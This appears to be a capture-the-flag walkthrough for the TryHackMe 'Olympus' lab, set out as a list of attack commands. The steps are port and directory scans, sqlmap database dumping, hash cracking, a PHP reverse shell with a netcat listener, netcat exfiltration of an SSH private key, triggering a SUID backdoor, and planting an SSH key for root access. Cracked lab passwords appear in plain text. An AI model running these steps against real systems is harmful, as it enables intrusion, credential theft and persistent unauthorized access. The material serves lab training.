Olympus

Room Link: https://tryhackme.com/room/olympusroom

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

dirb http://olympus.thm

SQLMap

Kali

sqlmap -r req.txt --banner

Kali

sqlmap -r req.txt --tables

Kali

sqlmap -r req.txt --dbms=mysql --dump

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt 

Rerun because VM crashed

Browser

Username: prometheus
Password: summertime

Browser

Username: prometheus
Password: summertime

Initial Shell

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php 

Kali

gobuster -U prometheus -P summertime dir -u chat.olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

This was there before when we ran sqlmap

I deleted the old results of sqlmap to force it to rerun again as it was just giving the old results

Kali

rm -rf /root/.sqlmap/output/olympus.thm/
sqlmap -r req.txt --dbms=mysql --dump -T chats -D olympus

Kali

nc -lvnp

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

cd /home/zeus
cat zeus.txt 

Victim

find / -perm -u=s -type f 2> /dev/null

Victim

ls -lah /usr/bin/cputils
/usr/bin/cputils

Netcat

Kali(receiving)

nc -l -p 1234 > id_rsa

Victim(sending)

cd /tmp
nc -w 3 $KALI 1234 < id_rsa

Kali

chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt 

Kali

ssh -i id_rsa zeus@$VICTIM
Password: snowflake

Privilege Escalation

Victim

cd /var/www/html/0aB44fdS3eDnLkpsz3deGv8TttR4sc/
cat VIGQFQFMYOST.php

Victim

/lib/defended/libc.so.99;uname -a; w; $suid_bd
whoami

Secret Flag

Kali

ssh-keygen -t rsa
cat /root/epic.pub

Victim

vi /root/.ssh/authorized_keys

Kali

ssh -i epic root@VICTIM

Victim

grep -r  "flag{" /